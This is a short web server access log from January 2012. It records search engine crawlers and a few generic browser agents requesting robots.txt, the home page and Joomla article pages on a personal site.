77.88.24.28 - - [08/Jan/2012:11:28:56 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.72.138 - - [08/Jan/2012:12:42:41 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.138 - - [08/Jan/2012:12:42:41 +0100] "GET / HTTP/1.1" 304 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.181.108.86 - - [08/Jan/2012:13:33:04 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.72.138 - - [08/Jan/2012:16:19:56 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=21&catid=17&Itemid=44 HTTP/1.1" 200 2943 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.138 - - [08/Jan/2012:20:16:13 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=9&Itemid=31 HTTP/1.1" 200 3514 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.88.24.28 - - [08/Jan/2012:20:21:43 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
193.252.118.176 - - [09/Jan/2012:00:48:05 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.176 - - [09/Jan/2012:00:48:25 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
124.115.1.61 - - [09/Jan/2012:04:14:51 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.80.194.29 - - [09/Jan/2012:04:24:36 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Sky Broadband; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
124.115.1.62 - - [09/Jan/2012:04:55:57 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [09/Jan/2012:05:07:29 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [09/Jan/2012:05:23:14 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.19 - - [09/Jan/2012:06:33:54 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.92 - - [09/Jan/2012:06:34:32 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
124.115.6.10 - - [09/Jan/2012:06:54:34 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
123.125.71.76 - - [09/Jan/2012:07:22:08 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.72.138 - - [09/Jan/2012:10:40:04 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.138 - - [09/Jan/2012:10:40:04 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=5:website-bcrs-online&catid=7:website&Itemid=34 HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.52.104.88 - - [09/Jan/2012:19:50:57 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.72.138 - - [09/Jan/2012:20:32:50 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=12 HTTP/1.1" 200 3812 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.30 - - [09/Jan/2012:21:36:30 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.75 - - [09/Jan/2012:21:37:11 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
